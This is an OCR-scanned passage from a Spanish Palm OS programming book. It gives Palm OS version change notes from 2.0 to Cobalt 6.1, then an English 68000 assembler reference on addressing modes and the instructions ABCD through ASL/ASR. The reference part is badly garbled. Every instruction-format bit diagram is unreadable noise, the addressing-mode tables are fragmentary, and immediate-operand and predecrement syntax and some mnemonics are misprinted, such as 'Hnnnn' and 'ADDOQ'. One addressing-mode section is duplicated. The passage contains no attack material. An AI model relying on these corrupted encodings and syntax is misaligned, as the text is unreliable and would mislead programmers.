Referencia Para más detalle acerca de inspeccionar para las caracteristicas presentes, valla al Capitulo 10. 
Cambios en la Version 2.0 


CAmbios destacados: 

.-Se incluyen Scroll bars y funciones asociadas para manipularlas. 

Nuevo codigo para soportar lookup telefónico y acceso para el panel de preferencias de sistema. 
.-Se da soporte para TCP/IP (sólo en dispositivos con 1MB o más de memoria). 
Matemáticas del punto flotante IEEE, incluyendo flotadores de 32 bits y dobles de 64 bits. 
Nuevo sistema de escritura llamado Graffiti. 

Soporte para nuevas cadenas de caracteres. 

Cambios presentes de versiones tempranas incluidas 

Las preferencias de aplicación. 

.-El diálogo del teclado de sistema. 

Edicion de diálogo de categorías 


Cambios en la Version 3.0 


Características agregadas a la versión 3.0 incluyen: 

.- IR beaming 

.- Un tipo de letra grande Bold. 

.- Funciones de interface dinamica para el usuario. 

.- Tipos de letra personalizados. 

.- Administrador de diálogo de progreso. 

.- Un único ID DE IDENTIDAD del hardware con flash ROM. 

.- Archivo para soportar registros largos de más de 64KB. 

.- Soporte para archivos MIDI Estándars (SMF) y sonido pregrabado con buen estado asincrónico. 
Caracteristas que cambiarón de anteriores versiones incluye: 

.- Adicionalmente más cambios para la edición de categorías. 

.- Acumulación dinámica aumentada para 96KB en el tamaño. 

.- Almacenamiento de la RAM configurada como un solo bloque en lugar de bloques múltiples de 64KB. 
.- El lanzamiento de aplicaciónes se convierte en una aplicación existente mejor que un sistema pop-up 


Cambios en la Version 3.1 


Las características agregadas a la versión 3.1 incluyen: 
. Contraste diálogo de ajuste (Solo en dispositivos en la familia de la V Palm ). 


.- Soporte para el procesador DragonBall EZ 

Caracteristicas que han cambiado en anteriores versiones incluyen: 

. La codificación de carácteres se convirtió en la página de código de caracteres de Microsoft Windows 
codigo de páginas 1252. 

.- Las cajas de texto TextBox ahora pueden cualquier punteado o subrayados sólidos. 

.- El carácter de variables cambiao para tener dos bytes de largo 


Cambios en la Version 3.2 


Las características agregadas a la versión 3.2 incluyen: 

.- Función para anexar datos al portapapeles sin borrar sus contenidos actuales. 

.- Diálogos de alerta para los errores de runtime, para ser usado cuando un error de runtime no sea 
aplicación default (por ejemplo, al enlazar aplicaciones en una red) 


Cambios en la Version 3.3 


Las características agregadas la versión 3.3 incluyen: 

.- Soporte para el símbolo europeo de la moneda circulante. 

.- Nuevo Serial Manager introducido, añadiendo más capacidades seriales flexibles de conexión, como 
conexiones seriales por el infrarrojo y soporte para el estándar IrCOMM. 

.- Login script (Instrucciones para conectarse a internet) mejorada para conectarse sistemas remotos que 
usan autenticación del tokenbased. 

.- Operaciones más rápidas HotSync, así como también las operaciones HotSync por infrarrojo 


Cambios en la Version 3.5 


Características agregadas a la versión 3.5 incluyen: 

.- Pantalla a color y soporte para dibujar. 

.- Nuevas definiciones de datos (por ejemplo, Ulnt16 en lugar de Word). 

.- Barra de ordenes conteniendo botones para artículos del menú comúnmente usados. 

.- El dispositivo deslizante y repitiendo controles del dispositivo deslizante. 

.- Controles gráficos. 

.- El administrador da simultaneidad para permitir localización más fácil de aplicaciones sin que requiera 
recompilación completa. 

.- Las rutinas nuevas de seguridad para permitir cambiar a un estado sin precedente oculta dentro de una 
aplicación, en lugar de tener que confiar en la applet Security. 

.- Rutinas nuevas en tablas para implementar registros ocultos 

Los cambiós de anteriores versiones incluyen: 

. Soporte extendido para dispositivos, incluyendo la habilidad a asignar una función del callback para eventos 
de dispositivos. 

.- Textbox's permite doble golpe para seleccionar palabras, o el triple taps (Golpe) seleccionar líneas de 
texto. Los menús pueden ser exhibidos golpeando ligeramente la barra de títulos de una aplicación 


Cambios en la versión 6.0 Palm Os Cobalt 


.- Soporte para camaras fotograficas integradas de hasta 8 Mega Pixeles de resolución, Grabación de video 
en tiempo real, Reproductor de mp3, Soporte para entrada para audifonos 


PalmSource presentó su nuevo sistema operativo Palm OS 6.1 el día 28/09/2004 


PalmSource introdujo el Palm OS Cobalt 6.1, una versión mejorada del Palm OS Cobalt. Diseñado para 
acelerar el desarrollo de la nueva generación de smartphones Palm y dispositivos inalámbricos, Palm OS 
Cobalt 6.1 está basado en el Palm OS Cobalt y provee características de telefonía integradas, soporte WiFi y 
Blutooth y mejoras en la interfaz del usuario. 


"Creemos que el Palm OS Cobal 6.1 optimiza nuestra plataforma para la creación de smartphones y 
dispositivos wireless muy poderosos, pero a su vez, muy fáciles de utilizar", dijo David Nagel, presidente y 
CEO de PalmSource, Inc. "Integrando la funcionalidad wireless al Palm OS, brindando, a la comunidad de 
desarrolladores y a los licenciatarios de Palm OS, una ventaja en el desarrollo de smartphones y dispositivos 
wireless móviles a los consumidores." 


Nuevas características del Palm OS Cobalt 6.1: 


Componentes de telefonía integrados: 

Palm OS Cobalt 6.1 incluye el estándar GSM, MUX y el nuevo GPRS API diseñado para facilitar y acelerar el 
trabajo de los manufacturadores de hardware. 

Soporte Blutooth y WiFi: 

Palm OS Cobalt 6.1 incorpora la última implementación v.1.2 de Bluetooth, en adición a nuevos perfiles de 
auriculares y manos libres críticos para el desarrollo de la nueva generación de smartphones y otros 
dispositivos wireless. Además, Palm OS Cobalt 6.1 provee soporte 802.11 diseñado para permitir a los 
desarrolladores de dispositivos construir productos con WiFi incorporado. 

Soporte SD/IO: 

Palm OS Cobalt 6.1 provee soporte estándar SD/IO diseñado para permitir la creación de tarjetas de 
expansión como cámaras, sistemas GPS y radios inalámbricas. 

Interfaz de usuario mejorada: 

Un nuevo diseño en la interfaz del Palm OS Cobalt 6.1 entrega a muchas aplicaciones un nuevo look más 
moderno. Palm OS Cobalt 6.1 introduce la aplicación Preferencias diseñada para permitir que el usuario 
configure una cantidad de configuraciones y preferencias del sistema en una única locación. 


El dia 12/02/2004 PalmSource reveló que el Palm OS Cobalt no ofrecerá la capacidad de sincronización con 
el Mac OS. En un sorpresivo anuncio en la conferencia de desarrolladores, PalmSource reveló que el Palm 
OS Cobalt no ofrecerá la capacidad de sincronización con el Mac OS. Es un abandono del soporta para las 
computadoras Macintosh, ya que las versiones previas del Palm OS venían con soporte para la 
sincronización con el Mac OS. 


Durante una conferencia sobre las nuevas características del Cobalt, Larry Slotnick reveló que el Palm OS 
Cobalt no traerá un cliente de sincronización con el Mac OS. En efecto, PalmSource abandonará el soporte 
nativo para Mac OS y no desarrollará la aplicación de escritorio Palm Desktop para Mac. 


PalmSource tomó esta desición debido a cambios en la arquitectura del Palm OS y por cómo trabajan las 
nuevas aplicaciones PIM. El nuevo PIM ha sido rediseñado para que los campos sean semejantes a los 
utilizados por el Microsoft Outlook y la nueva base de datos interna utilizará un esquema de guardado de 
datos del tipo SQL. 


Por fortuna, la empresa Mark/Space, ha difundido que hará una versión de su aplicación Missing Sync para 
el Cobalt OS. Será lanzada a fines de este año anticipándose así a los primeros dispositivos con Cobalt OS. 
Missing Sync para Cobalt permitirá a los usuarios conectar y sincronizar información entre su dispositivo 
Cobalt OS y una Mac corriendo el MacOS X, mediante un puerto USB, una red, Wifi o Bluetooth. 


Resumen 


Este capítulo le dio una idea de las características de los cambios en Palm OS, y explicó un poco aproximadamente 
cuántos cambios hubo. Usted ahora debería saber lo siguiente: 

. Palm OS opera siempre aun apagado, el dispositivo no está nunca realmente apagado “, ” sólo descansando. 

. Las aplicaciones Palm OS codifican código cuando arranca ó enciende su palm, y si el código es llamdo para un inicio 
normal, entonces entran en un evento loop y se queda en la cola de acontecimientos del sistema. 

. La memoria Palm OS está dividida en áreas dinámicas de almacenamiento y, cada uno con sus propias únicas 
limitaciones. 

. Una aplicación palm OS esta compuesta por recursos del sistema, alguna de la cual sea creado por el ambiente de 
desarrollo, y alguna de la cual debe ser suministrado por el desarrollador. 

. Los elementos de la interfaz del usuario abundan en Palm OS, y si ninguno de los elementos previstos de su 
aplicación quiere hacer su trabajo, usted siempre puede hacer su propio uso de los recursos del sistema. 

. El Palm OS provee protocolos numerosos para comunicar con otros dispositivos. 

. Si su aplicación usa características que se introdujeron en una reciente versión del Palm OS, fácilmente puede 
comprobar su ambiente para ver, entonces qué características están disponibles antes de llamar una función 
potencialmente sin apoyo. 
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n Este Capítulo Escribira su primer aplicación en el sistema Palm Os 
Iniciaremos escribiendo una aplicacion que muestre el hola mundo, Aprenderemos como 


iniciar su aplicacion.corriendo atravez de un elemento Main loop enlazado, cominicando los 
elementos administrados por la memoria. 


Chapter 


Assembler Reference (Referencia Ensamblador Palm) 


Addressing Capabilities 


Addressing Modes 
Instruction Set 


1.-ABCD 2.-ADD 3.-ADDA 4.-ADDI 5.-ADDQ 
6.-ADDX 7.-AND 8.-ANDI 9.-ANDIto CCR — 10.-ANDI to SR 
11.-ASI,ASR  12-Bcc,BRA  13.-BCHG 14.-BCLR 15.-BKPT 
16.-BSET 17.-BSR 18.-BTST 19.-CHK 20 CTE 
21.-CMP 

Addressing Modes 


The various addressing modes available on the 68000 are listed below. EA refers to Effective Address, 
Generation refers to the mechanism for obtaining the effective address, EEE Mode is the value of the 
EEE bits in the instruction word, and AAA Mode is the value of the AAA bits in the instruction word. 


1) Dn — Data Register Direct 


Generation : EA = Dn (n=0 to 7) 
Assembler : Dn 
EEE Mode : 000 


AAA Mode : nmn (0 to 7) 
The operand is the specified data register. 


2) An — Address Register Direct 


Generation : EA = An (n=0 to 7) 
Assembler : An 

EEE Mode : 001 

AAA Mode : nmn (0 to 7) 

The operand is the specified address register. 


3) (An) — Address Register Indirect 


Generation : EA = (An) (n=0 to 7) 

Assembler : (An) 

EEE Mode : 010 

AAA Mode : nmn (0 to 7) 

The operand is the memory location whose address is contained in the specified address register. 


4) (An)+ — Address Register Indirect with Postincrement 


Generation : EA = (An) (n=0 to 7); An = An + N (N = operand size: 1=byte, 2=word, 4=long) 
Assembler : (An)+ 

EEE Mode : 011 

AAA Mode : nmn (0 to 7) 

The operand is the memory location whose address is contained in the specified address register, prior to 
the addition of the operand size to the address register contents. 


5) (An) — Address Register Indirect with Predecrement 


Generation : An = An - N (N = operand size: 1=byte, 2=word, 4=long); EA = (An) (n =0 to 7) 
Assembler : -(An) 

EEE Mode : 100 

AAA Mode : nmn (0 to 7) 

The operand is the memory location whose address is contained in the specified address register, after 
the subtraction of the operand size from the address register contents. 


6) (d16,An) — Address Register Indirect with Displacement 


Generation : EA = (An) +d (n=0to 7) 
Assembler : Label(An) 


EEE Mode : 101 

AAA Mode : nmn (0 to 7) specifies the address register An. 

The effective address of the operand is obtained by computing the sum of the contents of the specified 
address register with the 16-bit displacement using standard 680x0 address arithmetic. Thus, the 16-bit 
displacement is sign-extended to 32 bits prior to the computation. 


7) (d8,An,Xn) — Address Register Indirect with Displacement And Index 


Generation : EA = (An) + (Xn)+d (n=0to 7) 

Assembler : Label(An,Xn.W) -or- Label(An,Xn.L) 

EEE Mode : 110 

AAA Mode : nmn (0 to 7) specifies the address register An. Xn is specified by an extension word. 

The effective address of the operand is obtained by computing the sum of the contents of the specified 
address register with the 8-bit displacement and the contents of the specified index register using 
standard 680x0 address arithmetic. Thus, the 8-bit displacement is sign-extended to 32 bits prior to the 
computation. The index register may be any data or address register (hence Xn may be the same as An 
in the instruction) and the value obtained from the index register may be either a word (which will be 
sign-extended for the addition) or a long. 


8) (xxx).W — Absolute Short 


Generation : EA given 

Assembler : Label.W 

EEE Mode : 111 

AAA Mode : 000 

The effective address 1s the contents of the word following the instruction word. This word is sign- 
extended to 32 bits prior to use as an address reference. 


9) (xxx).L — Absolute Long 


Generation : EA given 

Assembler : Label.L 

EEE Mode : 111 

AAA Mode : 001 

The effective address is the contents of the long word following the instruction word. 


10) +<data> — Immediate Data. 
Generation : Operand given (EA = address of instruction word + 2) 


Assembler : Hnnnn 
EEE Mode: 111 


AAA Mode : 100 

The effective address of this operand is the address of the instruction word plus two. For byte and word 
operands, the word at this address contains the immediate data. For long operands, the long word at this 
address contains the immediate data. 


11) (d16,PC) — Program Counter Indirect with Displacement 


Generation : EA = (PC) +d (n=0to 7) 

Assembler : Label(PC) 

EEE Mode : 111 

AAA Mode : 010 

The effective address of the operand is obtained by computing the sum of the contents of the program 
counter with the 16-bit displacement using standard 680x0 address arithmetic. Thus, the 16-bit 
displacement is sign-extended to 32 bits prior to the computation. 


12) (d8,PC,Xn) — Program Counter Indirect with Displacement And Index 


Generation : EA = (PC) + (Xn) +d (n=0to 7) 

Assembler : Label(PC,Xn.W) -or- Label(PC,Xn.L) 

EEE Mode : 111 

AAA Mode : 011 

Xn is specified by an extension word. 

The effective address of the operand is obtained by computing the sum of the contents of the program 
counter with the 8-bit displacement and the contents of the specified index register using standard 680x0 
address arithmetic. Thus, the 8-bit displacement is sign-extended to 32 bits prior to the computation. The 
index register may be any data or address register (hence Xn may be the same as An in the instruction) 
and the value obtained from the index register may be either a word (which will be sign-extended for the 
addition) or a long. 


1.-ABCD - Add Decimal With Extend 


Operation * 
src(10) + dst(10) + X -> dst 
Assembler example 


ABCD Dy,Dx 
ABCD -(Ay),-(Ax) 


Attributes 


size=Byte 
Description 
Perform Binary Coded Decimal (BCD) addition of the source and destination operands, together with 


the Extend (X) bit of the CCR. The only legal addressing modes are those given above. This is a byte 
operation only. 


Condition Codes 


Condition Code Convention 

The following convention is used to illustrate condition code status: 
- Flag unchanged by operation 

O Flag set to O by operation 

1 Flag set to 1 by operation 

* Flag changed functionally according to operation 


U Flag undefined after operation 


N — Undefined. 

V — Undefined. 

Z, — Cleared if nonzero result, unchanged otherwise. 

C — Set if DECIMAL carry generated, cleared otherwise. 
X — Set identically to C. 


Note: Normally, the Z bit is set via programming (this is the programmer's responsibility) before the 
start of an ABCD operation. This allows successful tests upon completion of multiple-precision ABCD 
Operations. 


Instruction Format 


Jo fo] JJ Jo Jo foo Ja fx [ f 


Instruction Fields 


XXX : Register Rx field. Specifies which register 1s used for the destination operand, DO-D7 for ABCD 
Dy,Dx or A0-A7 for ABCD -(Ay),-(Ax) 


YYY : Register Ry field. Specifies which register is used for the source operand, DO-D7 for ABCD Dy, 
Dx or A0-A7 for ABCD -(Ay),-(Ax) 


M : R/M field. Specifies addressing mode. 
0 : mode is ABCD Dy,Dx 
1 : mode is ABCD -(Ay),-(Ax) 


2.-ADD - Add Binary 


Operation * 
src + dst -> dst 


Assembler 
ADD <ea>,Dn 
ADD Dn,<ea> 


Attributes 
size=Byte, Word,Long 


Description 

Add the source operand to the destination operand, and store the result in the destination operand. The 
operation may be specified to be byte, word or long in size. The mode of the instruction indicates which 
1s the source and which is the destination operand. 


Condition Codes 


N — Set if result negative when treated as 2's complement. Cleared otherwise. 
V — Set if an overflow is generated. Cleared otherwise. 

Z — Set 1f result is zero. Cleared otherwise. 

C — Set if a binary carry is generated. Cleared otherwise. 

X — Set identically to C. 


Instruction Format 


Ju Jo fo Je fr Jm pu mE fE fe fa Ja ja] 


Instruction Fields 


RRR : Register field. Specifies any data register DO-D7. 
MMM : Op-Mode field. Specifies operation type in accordance with the table: 


Dn 


100 101 110 A 
<ea> 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 
Addressing Modes 


The various addressing modes available on the 68000 are listed below. EA refers to Effective Address, 
Generation refers to the mechanism for obtaining the effective address, EEE Mode is the value of the 
EEE bits in the instruction word, and AAA Mode is the value of the AAA bits in the instruction word. 


1) Dn — Data Register Direct 
Generation : EA = Dn (n=0 to 7) 


Assembler : Dn 
EEE Mode : 000 


AAA Mode : nmn (0 to 7) 
The operand is the specified data register. 


2) An — Address Register Direct 


Generation : EA = An (n=0 to 7) 
Assembler : An 

EEE Mode : 001 

AAA Mode : nmn (0 to 7) 

The operand is the specified address register. 


3) (An) — Address Register Indirect 


Generation : EA = (An) (n=0 to 7) 

Assembler : (An) 

EEE Mode : 010 

AAA Mode : nmn (0 to 7) 

The operand is the memory location whose address is contained in the specified address register. 


4) (An)+ — Address Register Indirect with Postincrement 


Generation : EA = (An) (n=0 to 7); An = An + N (N = operand size: 1=byte, 2=word, 4=long) 
Assembler : (An)+ 

EEE Mode : 011 

AAA Mode : nmn (0 to 7) 

The operand is the memory location whose address is contained in the specified address register, prior to 
the addition of the operand size to the address register contents. 


5) (An) — Address Register Indirect with Predecrement 


Generation : An = An - N (N = operand size: 1=byte, 2=word, 4=long); EA = (An) (n =0 to 7) 
Assembler : -(An) 

EEE Mode : 100 

AAA Mode : nmn (0 to 7) 

The operand is the memory location whose address is contained in the specified address register, after 
the subtraction of the operand size from the address register contents. 


6) (d16,An) — Address Register Indirect with Displacement 


Generation : EA = (An) +d (n=0to 7) 

Assembler : Label(An) 

EEE Mode : 101 

AAA Mode : nmn (0 to 7) specifies the address register An. 

The effective address of the operand is obtained by computing the sum of the contents of the specified 
address register with the 16-bit displacement using standard 680x0 address arithmetic. Thus, the 16-bit 
displacement is sign-extended to 32 bits prior to the computation. 


7) (d8,An,Xn) — Address Register Indirect with Displacement And Index 


Generation : EA = (An) + (Xn)+d (n=0to 7) 

Assembler : Label(An,Xn.W) -or- Label(An,Xn.L) 

EEE Mode : 110 

AAA Mode : nmn (0 to 7) specifies the address register An. Xn is specified by an extension word. 

The effective address of the operand is obtained by computing the sum of the contents of the specified 
address register with the 8-bit displacement and the contents of the specified index register using 
standard 680x0 address arithmetic. Thus, the 8-bit displacement is sign-extended to 32 bits prior to the 
computation. The index register may be any data or address register (hence Xn may be the same as An 
in the instruction) and the value obtained from the index register may be either a word (which will be 
sign-extended for the addition) or a long. 


8) (xxx).W — Absolute Short 


Generation : EA given 

Assembler : Label.W 

EEE Mode : 111 

AAA Mode : 000 

The effective address 1s the contents of the word following the instruction word. This word is sign- 
extended to 32 bits prior to use as an address reference. 


9) (xxx).L — Absolute Long 


Generation : EA given 
Assembler : Label.L 
EEE Mode : 111 
AAA Mode : 001 


The effective address is the contents of the long word following the instruction word. 


10) +<data> — Immediate Data. 


Generation : Operand given (EA = address of instruction word + 2) 

Assembler : Fnnnn 

EEE Mode : 111 

AAA Mode : 100 

The effective address of this operand is the address of the instruction word plus two. For byte and word 
operands, the word at this address contains the immediate data. For long operands, the long word at this 
address contains the immediate data. 


11) (d16,PC) — Program Counter Indirect with Displacement 


Generation : EA = (PC) + d (n=0 to 7) 

Assembler : Label(PC> 

EEE Mode : 111 

AAA Mode : 010 

The effective address of the operand is obtained by computing the sum of the contents of the program 
counter with the 16-bit displacement using standard 680x0 address arithmetic. Thus, the 16-bit 
displacement is sign-extended to 32 bits prior to the computation. 


12) (d8,PC,Xn) — Program Counter Indirect with Displacement And Index 


Generation : EA = (PC) + (Xn)+d (n=0to 7) 

Assembler : Label(PC,Xn.W) -or- Label(PC,Xn.L) 

EEE Mode : 111 

AAA Mode : 011 

Xn is specified by an extension word. 

The effective address of the operand is obtained by computing the sum of the contents of the program 
counter with the 8-bit displacement and the contents of the specified index register using standard 680x0 
address arithmetic. Thus, the 8-bit displacement is sign-extended to 32 bits prior to the computation. The 
index register may be any data or address register (hence Xn may be the same as An in the instruction) 
and the value obtained from the index register may be either a word (which will be sign-extended for the 
addition) or a long. 


Source <ea> operand: 


id 111 011 


(An: word or long only) 


Destination <ea> operand: 


| Anregnum_ | 
| Ansegnum_ | 
(209,W 


(de,PC, 
Xn) 
Notes: 
1) If the destination is a data register, then the ADD <ea>,Dn form of the instruction MUST be used. 


2) ADDA is used for ADD <ea>,An. ADDI is used for ADD Hnmn,<ea> where <ea> is not a data 
register. ADDQ is also used for ADD Fnnn,<ea> when possible. 


3.-ADDA - Add Address 


Operation * 
src + dst -> dst 


Assembler 
ADDA <ea>,An 


Attributes 
size=Word,Long 


Description 

Add the source operand to the destination address register, and store the result in the destination address 
register. The size of the operation may be specified to be a word or long operation. 

Note: All address arithmetic on address registers is performed using the entire 32 bits of the address 
register. Word operands are sign-extended to 32 bits before adding. 

Condition Codes 

Not affected. 

Instruction Format 


1] Jo fr fe Jefe Ju Ju JE JE fea Ja fa] 


Instruction Fields 

RRR : Specifies one of the address registers AO-A7. This 15 ALWAYS the destination operand. 
MMM : Op-Mode field. Specifies the size of the operation: 

011: Word operation. See note above 

111: Long operation 

EEE/AAA : Specifies the effective address of the <ea> operand. 

The legal addressing modes are: 


Addr , 


001 
EN 


(d8s,PC, 
Xn) 


111 011 


4.-ADDI - Add Immediate Operand 


Operation * 
immediate data + dst -> dst 


Assembler 
ADDI Hnnmn,<ea> 


Attributes 
size=Byte, Word,Long 


Description 
Add the immediate data contained in the instruction to the destination operand, and store the result in the 
destination location. 
Note: The contents of the immediate operand part of the instruction is as follows: 
Byte:  2nd word of operand, upper byte zero. 
Word: — 2nd word of operand. 
Long:  2nd and 3rd word of operand. 
Extension words for complex addressing modes follows the immediate operand. 


Condition Codes 


N — Set if result negative when treated as 2's complement. Cleared otherwise. 
V — Set if an overflow is generated. Cleared otherwise. 

Z — Set 1f result is zero. Cleared otherwise. 

C — Set if a binary carry is generated. Cleared otherwise. 

X — Set identically to C. 


Instr 


ojo Jo fojo Jj Jo]s js JEJEJE fa Ja [a] 


Instruction Fields 

SS : Size field. Specifies operation size. 
00 = byte operation 

01 = word operation 

10 = long operation 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


E E 


=> 


(d8,PC, 
Xn) 


111 011 


BBB... : Byte immediate data field. The immediate data is contained here. The WWW... field is set to 
zero (00000000 binary) and the LLL... field does not exist. 


WWW... : Word immediate data field. The immediate data occupies both WWW... and BBB... fields. 
The LLL... field does not exist. 


LLL... : Long immediate data field. The immediate data occupies all BBB, WWW and LLL fields, and 
the long word is divided as follows: 

WWW...BBB... HIGH word of data 

LLL... LOW word of data 


5.-ADDO - Add Immediate Quick Operand 


Operation * 
immediate data + dst -> dst 


Assembler 
ADDOQ *nnmn,<ea> 


Attributes 
size=Byte, Word,Long 


Description 

Add the immediate data contained in the instruction to the destination operand, and store the result in the 
destination location. The range of values for the immediate operand is 1 to 8, represented in the 
instruction by 0 to 7 (0 representing a value of 8). The immediate data is automatically coerced to the 
operation size by the 68000. 


Condition Codes 


N — Set if result negative when treated as 2's complement. Cleared otherwise. 
V — Set if an overflow is generated. Cleared otherwise. 


Z, — Set if result is zero. Cleared otherwise. 
C — Set if a binary carry is generated. Cleared otherwise. 
X — Set identically to C. 


Note: Condition codes are not affected if the addition destination is an address register. 
Instruction Format 


o] Jo fr [pp > Jo]s/sJe]E Jefa Ja fa] 


Instruction Fields 
DDD : Data field. 3 bits of immediate data, O representing a value of 8, 1-7 representing those values 
repsectively. 


SS : Size field. Specifies operation size. 
00 = byte operation 
01 = word operation 
10 = long operation 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Fa A 
ACTES] IMEI INE 


(d8s,PC, 
Xn) 


(An: word or long only) 


6.-ADDX - Add With Extend 


Operation * 
src + dst + X -> dst 


Assembler 
ADDX Dy,Dx 
ADDX —(Ay),-(Ax) 


Attributes 
size=Byte, Word,Long 


Description 
Add the source operand to the destination operand, along with the extend bit, and store the result in the 
destination location. 


Condition Codes 


N — Set if result negative when treated as 2's complement. Cleared otherwise. 
V — Set if an overflow is generated. Cleared otherwise. 

Z, — Cleared if result is non-zero. Unchanged otherwise. 

C — Set if a binary carry is generated. Cleared otherwise. 

X — Set identically to C. 


Note: Normally the Z bit is set via programming (e.g., using MOVEQ +0,DO) before the start of the 
operation. This allows successful tests for zero operands upon completion of multiple-precision 
operations. 


Instruction Format 


Ju Jo fr ppeJ><]x]" Js so Joe [xv] f] 


Instruction Fields 


XXX : Register Rx field. Specifies the destination register, depending upon R field. 


SS : Size field. Specifies operation size. 
00 = byte operation 

01 = word operation 

10 = long operation 


R : R/M field, specifies operation addressing mode. 
0 : operation is ADDX Dy,Dx, and XXX, Y YY fields specify data registers. 
1 : Operation is ADDX -(Ay),-(Ax), and XXX, Y Y Y fields specify address registers. 


YYY : Register Ry field. Specifies the source register, depending upon R field. 


7.-AND - Logical AND operation 


Operation * 
src AND dst -> dst 


Assembler 
AND <ea>,Dn 
AND Dn,<ea> 


Attributes 
size=Byte, Word,Long 


Description 
Logically (bitwise) AND the source operand with the destination operand, and store the result in the 
destination location. 


Condition Codes 


N — Set if result negative when treated as 2's complement. Cleared otherwise. 
V — Always Cleared. 

Z — Set 1f result is zero. Cleared otherwise. 

C — Always Cleared. 

X — Not affected. 


Instruction Format 


LJ Jo Jo fe Je Je im Jm Je JEJE a fa fa 


Instruction Fields 


RRRK : Register field. Specifies any of the 8 data registers. 


MMM : Op-Mode field. Specifies operation according to: 


001 010 


100 101 110 


EEE : Destination Effective Address field. 

AAA : Destination (Address) Register field. 

EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


Source <ea> operand: 


100 An:reg.num 


anno] 


(d8,PC, 11 011 


Destination <ea> operand: 


Addr , 
509] EE) 


[a > [| - | 


H<data> 


A E 


EE 


Notes: 

1) If the destination is a data register, then it cannot be specified using destination <ea> addressing 
mode, but must use the destination Dn mode above instead. 

2) ANDI is used when the source is immediate data. 


8.-ANDI - Logical AND immediate 


Operation * 
immediate data AND dst -> dst 


Assembler 
ANDI +nnnmn,<ea> 


Attributes 
size=Byte, Word,Long 


Description 
Logically (Bitwise) AND the immediate data contained in the instruction to the destination operand, and 
store the result in the destination location. 


Note: The contents of the immediate operand part of the instruction is as follows: 
Byte: 2nd word of operand, upper byte zero. 

Word: 2nd word of operand. 

Long: 2nd and 3rd word of operand. 

Extension words for complex addressing modes follows the immediate operand. 


Condition Codes 


N — Set if the most significant bit of the result is set. Cleared otherwise. 
V — Always Cleared. 

Z — Set 1f the result is zero. Cleared otherwise. 

C — Always Cleared. 

X — Not Affected. 


Instruction Format 


Jo Jo fojfo Jo J Jo] js JEJEJE ja Ja [a] 


Instruction Fields 


SS : Size field. Specifies the size of the operation. 
00 = Byte operation. 

01 = Word operation. 

10 = Long operation. 


EEE/AAA : Specifies the effective address of the <ea> operand. 
The legal addressing modes are: 


ENE 


BBB... : Byte immediate data field. The immediate data is contained here. The WWW... field is set to 
zero (00000000 binary) and the LLL... field does not exist. 


WWW... : Word immediate data field. The immediate data occupies both WWW... and BBB... fields. 
The LLL... field does not exist. 


LLL... : Long immediate data field. The immediate data occupies all BBB, WWW and LLL fields, and 
the long word is divided as follows: 

WWW...BBB... HIGH word of data 

LLL... LOW word of data 


9.-ANDI - Logical AND immediate to CCR 


Operation * 
immediate data AND CCR -> CCR 


Assembler 
ANDI Fnnmn,CCR 


Attributes 
size=B yte 


Description 

Logically (Bitwise) AND the immediate data contained in the instruction to the contents of the 
Condition Code Register, and store the result in the Condition Code Register (low 8 bits of Status 
Register). 


Note: The contents of the immediate operand part of the instruction is as follows: 
Byte: 2nd word of operand, upper byte zero. 
Extension words for complex addressing modes follows the immediate operand. 


Condition Codes 


N — Cleared if Bit 3 of the operand is zero. Unchanged otherwise. 
V — Cleared if Bit 1 of the operand is zero. Unchanged otherwise. 
Z — Cleared if Bit 2 of the operand is zero. Unchanged otherwise. 
C — Cleared if Bit O of the operand is zero. Unchanged otherwise. 
X — Cleared if Bit 4 of the operand is zero. Unchanged otherwise. 


Instruction Format 


peo Jejeje fr feo JJ: ff: Je fo Jo] 


Jo Jo foJo Jo Jo Jo fs fs fs fs [s Ys Je 


Instruction Fields 
BBB... : Byte data instruction field. The immediate data is contained in this field. 


10.-ANDI - Logical AND immediate to SR (PRIVILEGED 
INSTRUCTION) 


Operation * 
IF 68000 in supervisor state THEN immediate data AND SR -> SR ELSE TRAP EXCEPTION 
(PRIVILEGE VIOLATION) 


Assembler 


ANDI Fnnm,SR 


Attributes 
size=Word 


Description 
Logically (Bitwise) AND the immediate data contained in the instruction to the contents of the Status 
Register, and store the result in the Status Register. 


Note: The contents of the immediate operand part of the instruction is as follows: 
Word : 2nd word of operand. 
Extension words for complex addressing modes follows the immediate operand. 


Condition Codes 


N — Cleared if Bit 3 of the operand is zero. Unchanged otherwise. 
V — Cleared if Bit 1 of the operand is zero. Unchanged otherwise. 
Z — Cleared if Bit 2 of the operand is zero. Unchanged otherwise. 
C — Cleared if Bit O of the operand is zero. Unchanged otherwise. 
X — Cleared if Bit 4 of the operand is zero. Unchanged otherwise. 


Instruction Format 


poo fojfeJo fr feo Ju Y ff Je fo Jo] 


Instruction Fields 


WWW... : Word data instruction field. The immediate data is contained in this field. 


11.-ASL,ASR - Arithmetic Shift 


Operation * 
dst (shifted by count) -> dst 


Assembler 
ASd Dx,Dy 
ASd Fnnmn,Dy 
ASd <ea> 


Attributes 
size=Byte, Word,Long 


Description 

Arithmetically shift the bits of the destination operand in the direction specified. The carry bit receives 
the last bit shifted out of the operand. The shift count for the operation can be specified in two ways: 

1) Immediate. The shift count value is 1-8. 

2) Data Register. The value contained in the specified data register, modulo 64, is used. 

If the destination operand is a memory operand, then the shift count is always 1, and the operand size is 
always word sized. 


ASL : Operand is shifted left by the value of the shift count. Bits shifted out of the high order bit are 
copied to the C and X bits of the CCR. V bit indicates sign changes during the operation. 


ASR : Operand is shifted right by the value of the shift count. Bits shifted out of the low order bit are 
copied to the C and X bit of the CCR. The sign bit (high-order bit) is replicated into the now vacant high- 
order bits. 


Condition Codes 


N — Set 1f result negative when treated as 2's complement. Cleared otherwise. 

V — Set 1f most significant bit is changed at any time during the operation. Cleared otherwise. 
Z — Set if result is zero. Cleared otherwise. 

C — Set according to the last bit shifted out of the operation. Cleared for a shift count of zero. 
X — Set according to the last bit shifted out of the operand. Unaffected for a shift count of zero. 


Instruction Format (Register Shifts) 


1] Ji pojejejelo fs]: jojo e fre fe] 


Instruction Fields 


CCC : Count/Register field. If immediate count, CCC = 1-7 for a shift count of 7, O for a shift count of 


8. If data register count, CCC = data register number for register Dx. The value contained in bits 0-5 of 
Dx is used as the shift count (1.e., Dx modulo 64). 


D : Direction field. Specifies shift direction. 
0 = right shift 
1 = left shift 


SS : Size field. Specifies the size of the operation. 
00 = Byte operation. 
01 = Word operation. 
10 = Long operation. 


